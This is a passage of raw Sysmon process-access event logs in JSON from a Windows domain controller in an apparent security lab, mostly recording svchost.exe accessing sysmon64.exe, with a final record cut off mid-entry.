{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 